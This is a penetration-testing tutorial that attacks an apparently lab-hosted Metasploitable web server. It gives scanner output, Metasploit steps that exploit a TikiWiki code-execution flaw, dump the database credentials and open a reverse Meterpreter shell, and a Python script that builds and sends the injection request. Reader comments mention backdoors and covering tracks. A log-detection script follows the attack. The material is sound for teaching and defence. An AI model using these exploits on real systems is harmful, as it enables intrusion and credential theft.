BASIC PENETRATION CONCEPTS ON A (VULNERABLE) GNU/LINUX PLATFORM USING METASPLOIT FRAMEWORK – PART VI
Attacking a Vulnerable Apache Server
Finding Vulnerabilities in the Apache Service (Port 80)
The use of Nikto to audit a web server and find its vulnerabilities was covered earlier. Here it is used to determine which of those vulnerabilities an attacker could exploit to break into the server. For more details on using Nikto, see here.
>nikto.pl -h 192.168.1.34:80
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.1.34
+ Target Hostname: 192.168.1.34
+ Target Port: 80
+ Start Time: 2011-05-21 23:08:10
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Number of sections in the version string differ from those in the database, the server reports: php/5.2.4-2ubuntu5.10 while the database has: 5.3.5. This may cause false positives.
+ PHP/5.2.4-2ubuntu5.10 appears to be outdated (current is at least 5.3.5)
+ ETag header found on server, inode: 67575, size: 45, mtime: 0x481ffa5ca8840
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-40478: /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://cirt.net/rfiinc.txt?: TikiWiki contains a vulnerability which allows remote attackers to execute arbitrary PHP code.
+ 6448 items checked: 2 error(s) and 11 item(s) reported on remote host
+ End Time: 2011-05-21 23:09:09 (59 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Alternatively, Metasploit's WMAP plugin can be used. It also scans the structure of the web server and reports possible vulnerabilities, with the advantage that the matching modules can then be run directly from Metasploit.
msf > wmap_targets -t 192.168.1.34
msf > wmap_run -t
[*] Testing target:
[*] Site: 192.168.1.34 (192.168.1.34)
[*] Port: 80 SSL: false
============================================================
[*] Testing started. Fri May 20 23:20:19 +0200 2011
=[ SSL testing ]=
============================================================
[*] Target is not SSL. SSL modules disabled.
=[ Web Server testing ]=
============================================================
[*] Loaded auxiliary/scanner/http/options ...
[*] Loaded auxiliary/scanner/http/frontpage_login ...
[*] Loaded auxiliary/scanner/http/svn_scanner ...
[*] Loaded auxiliary/scanner/http/robots_txt ...
[*] Loaded auxiliary/scanner/http/vhost_scanner ...
[*] Loaded auxiliary/scanner/http/http_version ...
[*] Loaded auxiliary/scanner/http/open_proxy ...
[*] Loaded auxiliary/admin/http/tomcat_administration ...
[*] Loaded auxiliary/admin/http/tomcat_utf8_traversal ...
[*] Loaded auxiliary/scanner/http/webdav_website_content ...
[*] Loaded auxiliary/scanner/http/webdav_internal_ip ...
[*] Loaded auxiliary/scanner/http/verb_auth_bypass ...
[*] Loaded auxiliary/scanner/http/web_vulndb ...
[*] Loaded auxiliary/scanner/http/webdav_scanner ...
[*] Loaded auxiliary/admin/http/contentkeeper_fileaccess ...
=[ File/Dir testing ]=
============================================================
[*] Loaded auxiliary/scanner/http/prev_dir_same_name_file ...
[*] Loaded auxiliary/scanner/http/dir_scanner ...
[*] Loaded auxiliary/scanner/http/copy_of_file ...
[*] Loaded auxiliary/scanner/http/dir_webdav_unicode_bypass ...
[*] Loaded auxiliary/scanner/http/backup_file ...
[*] Loaded auxiliary/scanner/http/replace_ext ...
[*] Loaded auxiliary/scanner/http/ms09_020_webdav_unicode_bypass ...
[*] Loaded auxiliary/scanner/http/trace_axd ...
[*] Loaded auxiliary/scanner/http/file_same_name_dir ...
[*] Loaded auxiliary/scanner/http/writable ...
[*] Loaded auxiliary/scanner/http/files_dir ...
[*] Loaded auxiliary/scanner/http/dir_listing ...
[*] Loaded auxiliary/scanner/http/brute_dirs ...
=[ Unique Query testing ]=
============================================================
[*] Loaded auxiliary/scanner/http/error_sql_injection ...
[*] Loaded auxiliary/scanner/http/blind_sql_query ...
=[ Query testing ]=
============================================================
=[ General testing ]=
============================================================
[*] Analysis completed in 11.3877420425415 seconds.
[*] Done.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
msf > db_vulns
[*] Time: Fri May 20 22:29:14 UTC 2011 Vuln: host=192.168.1.34 name=exploit/unix/webapp/tikiwiki_graph_formula_exec refs=CVE-2007-5423,OSVDB-40478,BID-26006
Analysing the output of Nikto and of the Metasploit WMAP plugin shows that several vulnerabilities have been detected, each a possible breach an attacker could take advantage of.
Taking this information as the entry point, the next step is to try to compromise the Apache web server on the remote machine. The procedure is as follows:
- The vulnerability detected by WMAP (exploit/unix/webapp/tikiwiki_graph_formula_exec, CVE-2007-5423) is exactly the same one Nikto reported as OSVDB-40478 in tiki-graph_formula.php, so that is the one to dig into.
- Nikto has also provided valuable general information about the server, such as the accepted HTTP methods (TRACE is enabled, which Nikto flags as exposing the host to cross-site tracing) and the default phpinfo.php file, which discloses the PHP configuration of the server. However, the TikiWiki vulnerability looks even more promising, since it allows arbitrary PHP code execution.
msf > search tikiwiki
[*] Searching loaded modules for pattern 'tikiwiki'...
Auxiliary
=========

   Name                      Disclosure Date  Rank    Description
   ----                      ---------------  ----    -----------
   admin/tikiwiki/tikidblib  2006-11-01       normal  TikiWiki information disclosure

Exploits
========

   Name                                     Disclosure Date  Rank       Description
   ----                                     ---------------  ----       -----------
   unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
   unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
   unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  TikiWiki jhot Remote Command Execution
- Several exploits and auxiliary modules appear that could exploit this vulnerability. After trying all of them, the results were as follows:
msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(tikidblib) > show options
Module options (auxiliary/admin/tikiwiki/tikidblib):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /tikiwiki        yes       TikiWiki directory path
   VHOST                     no        HTTP server virtual host
msf auxiliary(tikidblib) > set RHOST 192.168.1.34
RHOST => 192.168.1.34
msf auxiliary(tikidblib) > run
[*] Establishing a connection to the target…
[*] Get informations about database…
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password : root
[*] Auxiliary module execution completed
- Running the auxiliary module above yields the database credentials (root/root for the tikiwiki195 MySQL database) with no effort at all.
msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec
msf exploit(tikiwiki_graph_formula_exec) > show options

Module options (exploit/unix/webapp/tikiwiki_graph_formula_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /tikiwiki        yes       TikiWiki directory path
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tikiwiki_graph_formula_exec) > set RHOST 192.168.1.34
RHOST => 192.168.1.34
msf exploit(tikiwiki_graph_formula_exec) > exploit

[*] Started reverse handler on 192.168.1.33:4444
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch
[*] TikiWiki database informations :
    db_tiki : mysql
    dbversion : 1.9
    host_tiki : localhost
    user_tiki : root
    pass_tiki : root
    dbs_tiki : tikiwiki195
[*] Attempting to execute our payload...
[*] Sending stage (32145 bytes) to 192.168.1.34
[*] Meterpreter session 1 opened (192.168.1.33:4444 -> 192.168.1.34:51450) at Sat May 21 00:29:14 +0200 2011

meterpreter > sysinfo
OS          : Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Computer    : metasploitable
Meterpreter : php/php
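To make visible what the two TikiWiki modules above do on the wire, here is an added example written for this edit; it is not code from the original post, from Nikto or from the Metasploit modules. It builds a tiki-graph_formula.php request with the same shape as Nikto's OSVDB-40478 probe and extracts the connection settings from the db/local.php content that an injected PHP call returns. The layout of db/local.php is reconstructed from the variable names in the exploit output (db_tiki, host_tiki, user_tiki, pass_tiki, dbs_tiki) and is an assumption, as is the use of readfile('db/local.php') as the injected call; the sample file is constructed, and the live helper only runs when the script is invoked directly.

```python
"""Added example: reproduces offline the two steps Metasploit runs against
tiki-graph_formula.php (CVE-2007-5423): building the injection URL and
parsing the database credentials out of db/local.php. Not code from the
original post or from Metasploit; the local.php layout is an assumption."""
import re
import urllib.request
from urllib.parse import quote


def graph_formula_url(base, php_call, uri="/tikiwiki"):
    """Build the request in the shape of Nikto's OSVDB-40478 probe.

    The script inserts every f[] element into PHP source that it then
    evaluates. 'x.tan.' + php_call keeps that source a valid expression:
    '.' is PHP string concatenation and the bare words x and tan are just
    undefined constants, so php_call runs with whatever side effects it has.
    """
    payload = quote("x.tan." + php_call, safe="()./")
    return (f"{base}{uri}/tiki-graph_formula.php"
            f"?w=1&h=1&s=1&min=1&max=2&f[]={payload}&t=png&title=")


# Constructed sample of a TikiWiki 1.9 db/local.php (assumed layout; the
# variable names match the exploit output on the page).
SAMPLE_LOCAL_PHP = """<?php
$db_tiki='mysql';
$dbversion_tiki='1.9';
$host_tiki='localhost';
$user_tiki='root';
$pass_tiki='root';
$dbs_tiki='tikiwiki195';
?>
"""

# One  $name = 'value';  (or "value") assignment per line.
_ASSIGN_RE = re.compile(r"^\s*\$(\w+)\s*=\s*(['\"])(.*?)\2\s*;", re.MULTILINE)


def parse_local_php(text):
    """Return every simple $name='value'; assignment as a dict."""
    return {m.group(1): m.group(3) for m in _ASSIGN_RE.finditer(text)}


def db_credentials(text):
    """Pick out the connection settings the exploit module reports."""
    cfg = parse_local_php(text)
    wanted = ("db_tiki", "host_tiki", "user_tiki", "pass_tiki", "dbs_tiki")
    missing = [k for k in wanted if k not in cfg]
    if missing:
        raise ValueError(f"local.php is missing {missing}")
    return {k: cfg[k] for k in wanted}


def fetch_credentials(base, uri="/tikiwiki", timeout=10):
    """Live version: make the server print db/local.php and parse it.

    Assumes readfile() is available on the target (an assumption, not what
    the Metasploit module necessarily sends). Only run against a system
    you are authorised to test.
    """
    url = graph_formula_url(base, "readfile('db/local.php')", uri)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return db_credentials(body)


if __name__ == "__main__":
    print(graph_formula_url("http://192.168.1.34", "phpinfo()"))
    print(db_credentials(SAMPLE_LOCAL_PHP))
```

The point of the `x.tan.` prefix is that the injected text lands inside a PHP expression, so it has to stay syntactically valid: `.` concatenates, `x` and `tan` evaluate to their own names, and the trailing call is whatever the attacker chose. Swapping `phpinfo()` for a file read gives the information disclosure that the tikidblib module and the first phase of the exploit show; swapping it for an `eval` of a PHP Meterpreter stage gives the session shown above. The same single parameter covers the whole chain.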
Hello friend, I'm very interested in this post, get in touch
It's good, but from there you have to escalate privileges or upload a PHP shell 🙂
In the case of Metasploitable, there is no need to escalate privileges for the TikiWiki vulnerability, since the web server is running with root privileges. In the case of a different vulnerable web server, it will again depend on the user that keeps the process running: if it is root, no escalation is needed (but other steps are, such as covering tracks, cleaning up traces and creating backdoors).
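Since the comments end on covering tracks, it is worth looking at what this attack leaves behind in the web server's access log. The following is an added example, not code from the original post or its comments: it runs two detections over a few constructed Apache access-log lines, one for tiki-graph_formula.php requests whose f[] formula calls anything other than a plain math function (the injection shape both Nikto's OSVDB-40478 probe and the Metasploit module use), and one for the TRACE method Nikto flagged. The log lines, client addresses, user agents and the list of legitimate math functions are all assumptions made for the example.

```python
"""Added example: the defender's side of the attack shown on this page.
Runs two detections over constructed Apache access-log lines: (1) requests
to tiki-graph_formula.php whose f[] formula calls anything that is not a
plain math function, the CVE-2007-5423 injection shape both Nikto and the
Metasploit module use; (2) use of the TRACE method Nikto flagged (XST).
Not code from the original post; log lines, addresses and user agents are
made up for the example."""
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format (referer and user agent optional).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?')

# Functions a genuine graph formula may call (assumed list). A call to
# anything else inside f[] (phpinfo, passthru, system, eval, ...) only
# makes sense as code injection.
MATH_FUNCS = {"sin", "cos", "tan", "asin", "acos", "atan", "sinh", "cosh",
              "tanh", "sqrt", "exp", "log", "log10", "abs", "pow", "floor",
              "ceil", "round"}
CALL_RE = re.compile(r"([A-Za-z_]\w*)\s*\(")

SAMPLE_LOG = [  # constructed lines: Nikto probes, a legitimate graph, an exploit
    '192.168.1.33 - - [21/May/2011:23:08:12 +0200] "TRACE / HTTP/1.1" 200 45 '
    '"-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000021)"',
    '192.168.1.33 - - [21/May/2011:23:08:40 +0200] "GET /tikiwiki/tiki-graph_formula.php'
    '?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://cirt.net/rfiinc.txt? '
    'HTTP/1.1" 200 1847 "-" "Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:004502)"',
    '192.168.1.50 - - [21/May/2011:23:45:03 +0200] "GET /tikiwiki/tiki-graph_formula.php'
    '?w=300&h=200&s=1&min=-3&max=3&f[]=x*sin(x)&t=png&title=demo HTTP/1.1" 200 2210 '
    '"http://192.168.1.34/tikiwiki/" "Mozilla/5.0 (X11; Linux i686)"',
    '192.168.1.33 - - [22/May/2011:00:29:10 +0200] "GET /tikiwiki/tiki-graph_formula.php'
    '?w=1&h=1&s=1&min=1&max=2&f%5B%5D=x.tan.passthru(%27id%27)&t=png&title= HTTP/1.1" '
    '200 61 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.168.1.50 - - [22/May/2011:00:30:00 +0200] "GET /tikiwiki/tiki-index.php HTTP/1.1" '
    '200 9125 "-" "Mozilla/5.0 (X11; Linux i686)"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_formula_calls(target):
    """Names of non-math functions called inside any f[] parameter of a
    tiki-graph_formula.php request; [] for other paths or clean formulas."""
    parts = urlsplit(target)
    if not parts.path.endswith("/tiki-graph_formula.php"):
        return []
    # parse_qs percent-decodes, so f%5B%5D=... and f[]=... are both matched
    query = parse_qs(parts.query, keep_blank_values=True)
    found = []
    for formula in query.get("f[]", []):
        found += [fn for fn in CALL_RE.findall(formula)
                  if fn.lower() not in MATH_FUNCS]
    return found


def detect(lines):
    """Return (client_ip, reason) for every line that trips a detection."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "TRACE":
            alerts.append((rec["ip"], "TRACE method used (XST probe)"))
        calls = suspicious_formula_calls(rec["target"])
        if calls:
            alerts.append((rec["ip"], "tiki-graph_formula.php code injection: "
                           + ", ".join(calls)))
    return alerts


if __name__ == "__main__":
    for ip, reason in detect(SAMPLE_LOG):
        print(f"{ip}  {reason}")
```

Two details matter here. First, matching on the raw query string is not enough: the fourth line sends `f%5B%5D` and `%27`, so the formula must be percent-decoded before inspection, which parse_qs does. Second, a rule that simply fires on parentheses in f[] would flag every legitimate graph (`x*sin(x)`), so the check is for calls outside an allowlist of math functions, which is what separates the Nikto probe and the exploit request from ordinary use of the script. Clearing the access log afterwards, as the last comment suggests an attacker would, is exactly why such logs should also be shipped off the host.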